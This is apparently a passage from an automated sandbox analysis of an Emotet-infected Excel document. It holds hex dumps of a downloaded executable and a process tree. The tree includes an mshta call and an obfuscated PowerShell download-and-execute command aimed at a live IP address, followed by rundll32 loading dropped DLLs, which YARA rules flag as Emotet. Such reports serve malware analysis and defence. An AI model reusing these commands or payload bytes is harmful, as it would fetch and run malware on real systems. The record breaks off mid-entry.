                                                                                                                    Set-Cookie: 61f44d2196a27=1643400481; expires=Fri, 28-Jan-2022 20:09:01 GMT; Max-Age=60; path=/
                                                                                                                    Last-Modified: Fri, 28 Jan 2022 20:08:01 GMT
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 68 73 c2 61 2c 12 ac 32 2c 12 ac 32 2c 12 ac 32 ef 1d f3 32 26 12 ac 32 ef 1d f1 32 37 12 ac 32 2c 12 ad 32 0e 10 ac 32 0b d4 d1 32 36 12 ac 32 0b d4 c1 32 a6 12 ac 32 0b d4 c2 32 b2 12 ac 32 0b d4 d6 32 2d 12 ac 32 0b d4 d0 32 2d 12 ac 32 0b d4 d4 32 2d 12 ac 32 52 69 63 68 2c 12 ac 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 91 fa f3 61 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 50 04 00 00 20 04 00 00 00 00 00 06 0d 03 00 00 10 00 00 00 60 04 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 08 00 00 10 00 00 5d f5 08 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 2d 05 00 52 00 00 00 34 10 05 00 04 01 00 00 00 a0 05 00 50 76 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 08 00 30 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 bd 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 60 04 00 94 05 00 00 ac 0f 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 39 45 04 00 00 10 00 00 00 50 04 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 92 cd 00 00 00 60 04 00 00 d0 00 00 00 60 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 80 65 00 00 00 30 05 00 00 30 00 00 00 30 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 50 76 02 00 00 a0 05 00 00 80 02 00 00 60 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 76 93 00 00 00 20 08 00 00 a0 00 00 00 e0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$hsa,2,2,22&2272,2226222222-22-22-2Rich,2PELa!P `]@-R4Pv 0N@`@.text9EP `.rdata``@@.datae000@.rsrcPv`@@.relocv @B
                                                                                                                    Jan 28, 2022 21:08:01.720797062 CET23INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                    Data Ascii:
                                                                                                                    Jan 28, 2022 21:08:01.720813036 CET25INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                    Data Ascii:
                                                                                                                    Jan 28, 2022 21:08:01.720829010 CET26INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                    Data Ascii:
                                                                                                                    Jan 28, 2022 21:08:01.720845938 CET27INData Raw: 45 fc 83 c0 0c 83 c9 ff f0 0f c1 08 49 85 c9 7f 17 8b 55 fc 52 8b 45 fc 8b 08 8b 55 fc 8b 02 8b 11 8b c8 8b 42 04 ff d0 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 89 4d fc 8b 45 fc 8b 00 83 e8 10 8b e5 5d c3 cc cc cc cc cc cc cc
                                                                                                                    Data Ascii: EIUREUB]UQME]UQMjjdMlYEdhE]UQMEPM"]UQM]Ui]Ujh>dPQE3PEdMEPj
                                                                                                                    Jan 28, 2022 21:08:01.720863104 CET29INData Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 ec 0c 8b 45 0c 89 45 f8 8b 4d 08 89 4d fc c7 45 f4 00 00 00 00 eb 09 8b 55 f4 83 c2 01 89 55 f4 8b 45 f4 3b 45 10 73 12 8b 4d fc 03 4d f4 8b 55 f8 03 55 f4 8a 02 88 01 eb dd 8b e5 5d c3 cc cc
                                                                                                                    Data Ascii: UEEMMEUUE;EsMMUU]U}thjEPb]UQjh0EPjbEE]U}tEPEM;MrE>URE}t&}t E
                                                                                                                    Jan 28, 2022 21:08:01.720879078 CET30INData Raw: 8d c0 00 00 00 8b 45 e4 8b 48 08 89 4d dc 8b 55 08 8b 42 30 83 e8 01 f7 d0 23 45 dc 89 45 d8 8b 4d e4 51 8b 55 08 52 8b 4d d4 e8 b5 fd ff ff 89 45 e0 8b 45 ec 3b 45 d8 74 0b 8b 4d e8 03 4d f0 3b 4d d8 76 48 8b 55 e4 8b 42 24 25 00 00 00 02 74 0b
                                                                                                                    Data Ascii: EHMUB0#EEMQURMEE;EtMM;MvHUB$%tMuUEB$%EMUQ$UEE+EETMQURMu3DEEMMUUEH$MEUREPMhu3]
                                                                                                                    Jan 28, 2022 21:08:01.720896006 CET32INData Raw: 50 ff 15 a4 62 04 10 5d c3 cc 55 8b ec 83 ec 60 89 4d a0 c7 45 bc 00 00 00 00 c7 45 f0 00 00 00 00 6a 40 8b 45 0c 50 8b 4d a0 e8 eb f6 ff ff 85 c0 75 07 33 c0 e9 ea 03 00 00 8b 4d 08 89 4d f4 8b 55 f4 0f b7 02 3d 4d 5a 00 00 74 12 68 c1 00 00 00
                                                                                                                    Data Ascii: Pb]U`MEEj@EPMu3MMU=MZthb3MQ<REPMu3MUQ<UE8PEthb3xMQLthb3WEH8thb3:UBM
                                                                                                                    Jan 28, 2022 21:08:01.720912933 CET33INData Raw: 89 45 e8 8b 4d e4 83 c1 04 89 4d e4 8b 55 e0 83 c2 02 89 55 e0 8b 45 fc 8b 4d e8 3b 48 18 73 2d 8b 55 e4 8b 45 f0 03 02 50 8b 4d 0c 51 e8 3e f1 ff ff 83 c4 08 85 c0 75 12 8b 55 e0 0f b7 02 89 45 f8 c7 45 ec 01 00 00 00 eb 02 eb ad 83 7d ec 00 75
                                                                                                                    Data Ascii: EMMUUEM;Hs-UEPMQ>uUEE}ujb3)MU;Qvjb3EMHUE]UMEE}uMytUMQP(UjjEHQUUzt\EEEMU
                                                                                                                    Jan 28, 2022 21:08:01.720932961 CET34INData Raw: 0d c8 30 05 10 8b 15 cc 30 05 10 0f af 15 bc 30 05 10 03 0d c8 30 05 10 03 d1 03 15 c8 30 05 10 8b 0d c8 30 05 10 0f af 0d bc 30 05 10 03 d1 2b 15 c0 30 05 10 8b 0d cc 30 05 10 0f af 0d c8 30 05 10 0f af 0d cc 30 05 10 03 d1 8b 0d cc 30 05 10 0f
                                                                                                                    Data Ascii: 0000000+000000++0+0000000+000000++0+0000000+
                                                                                                                    Jan 28, 2022 21:08:01.885634899 CET36INData Raw: c8 30 05 10 2b 0d c8 30 05 10 8b 15 c8 30 05 10 0f af 15 c8 30 05 10 03 ca 2b 0d cc 30 05 10 a1 c8 30 05 10 0f af 05 c4 30 05 10 0f af 05 cc 30 05 10 2b c8 8b 15 c8 30 05 10 0f af 15 bc 30 05 10 2b ca a1 c0 30 05 10 0f af 05 cc 30 05 10 0f af 05
                                                                                                                    Data Ascii: 0+000+0000+00+000++00000++00+000+00+0+000+0000+00+0


                                                                                                                    Statistics

                                                                                                                    CPU Usage

                                                                                                                    Click to jump to process

                                                                                                                    Memory Usage

                                                                                                                    Click to jump to process

                                                                                                                    High Level Behavior Distribution

                                                                                                                    Click to dive into process behavior distribution

                                                                                                                    Behavior

                                                                                                                    Click to jump to process

                                                                                                                    System Behavior

                                                                                                                    General

                                                                                                                    Target ID:0
                                                                                                                    Start time:21:07:21
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                                                                                    Imagebase:0x13f1e0000
                                                                                                                    File size:28253536 bytes
                                                                                                                    MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high

                                                                                                                    General

                                                                                                                    Target ID:2
                                                                                                                    Start time:21:07:24
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:cmd /c mshta http://91.240.118.168/qqw/aas/se.html
                                                                                                                    Imagebase:0x4a330000
                                                                                                                    File size:345088 bytes
                                                                                                                    MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high

                                                                                                                    General

                                                                                                                    Target ID:4
                                                                                                                    Start time:21:07:25
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Windows\System32\mshta.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:mshta http://91.240.118.168/qqw/aas/se.html
                                                                                                                    Imagebase:0x13ff80000
                                                                                                                    File size:13824 bytes
                                                                                                                    MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high

                                                                                                                    General

                                                                                                                    Target ID:6
                                                                                                                    Start time:21:07:29
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
                                                                                                                    Imagebase:0x13fbe0000
                                                                                                                    File size:473600 bytes
                                                                                                                    MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                    Reputation:high

                                                                                                                    General

                                                                                                                    Target ID:8
                                                                                                                    Start time:21:07:42
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:"C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll AADD
                                                                                                                    Imagebase:0x4a330000
                                                                                                                    File size:345088 bytes
                                                                                                                    MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high

                                                                                                                    General

                                                                                                                    Target ID:9
                                                                                                                    Start time:21:07:42
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll AADD
                                                                                                                    Imagebase:0x950000
                                                                                                                    File size:44544 bytes
                                                                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.471313951.0000000000140000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    Reputation:high

                                                                                                                    General

                                                                                                                    Target ID:10
                                                                                                                    Start time:21:07:47
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer
                                                                                                                    Imagebase:0x950000
                                                                                                                    File size:44544 bytes
                                                                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.522412460.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.521968966.0000000000400000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.521762770.0000000000221000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.522161075.0000000002381000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.522361954.0000000002861000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.522256343.0000000002731000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.522563448.0000000002E71000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.522208158.00000000026B0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.522291162.00000000027A0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.521709838.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.521942436.00000000003D1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.521853368.0000000000370000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.522595880.0000000002ED0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.522683360.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.522655348.0000000003171000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    Reputation:high

                                                                                                                    General

                                                                                                                    Target ID:11
                                                                                                                    Start time:21:08:08
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Wlnljconerohcjaz\cekfidpy.yhq",MOdnuTnMIi
                                                                                                                    Imagebase:0x950000
                                                                                                                    File size:44544 bytes
                                                                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.524549461.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.525704176.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.524627088.00000000001B1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    Reputation:high

                                                                                                                    General

                                                                                                                    Target ID:12
                                                                                                                    Start time:21:08:13
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Wlnljconerohcjaz\cekfidpy.yhq",DllRegisterServer
                                                                                                                    Imagebase:0x950000
                                                                                                                    File size:44544 bytes
                                                                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.574709897.0000000000230000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.574966326.0000000000911000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.575355954.00000000024D1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.575698621.0000000002671000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.575069937.0000000002281000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.575241988.0000000002381000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.575278324.00000000023D0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.575484750.00000000025F0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.575139258.0000000002321000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.575185069.0000000002350000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.575020499.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.574936921.00000000008E0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.575098711.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.575908934.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.574901913.0000000000771000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    Reputation:high

                                                                                                                    General

                                                                                                                    Target ID:14
                                                                                                                    Start time:21:08:31
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Gdtjuon\eryfdrtz.qpz",NSMcfMaGRbKFCL
                                                                                                                    Imagebase:0x950000
                                                                                                                    File size:44544 bytes
                                                                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.577991543.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.577507576.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.577775644.00000000005F1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    Reputation:high

                                                                                                                    General

                                                                                                                    Target ID:15
                                                                                                                    Start time:21:08:37
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Gdtjuon\eryfdrtz.qpz",DllRegisterServer
                                                                                                                    Imagebase:0x950000
                                                                                                                    File size:44544 bytes
                                                                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.616094913.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.616750004.0000000002E40000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.616484887.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.616301764.00000000008A1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.616955117.0000000002F40000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.616430850.0000000000A71000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.616392195.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.615957746.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.616649136.0000000002590000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.615997372.00000000001D1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.616558132.0000000002411000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.616683416.00000000025C1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.616861944.0000000002EB1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.617100945.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.617022562.0000000002FD1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security

                                                                                                                    General

                                                                                                                    Target ID:16
                                                                                                                    Start time:21:08:52
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Mqenzhvktn\czphbxmqtcm.nzb",NscZMRYpRiE
                                                                                                                    Imagebase:0x950000
                                                                                                                    File size:44544 bytes
                                                                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.618439586.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.618251514.0000000000201000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.618216688.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security

                                                                                                                    General

                                                                                                                    Target ID:17
                                                                                                                    Start time:21:08:56
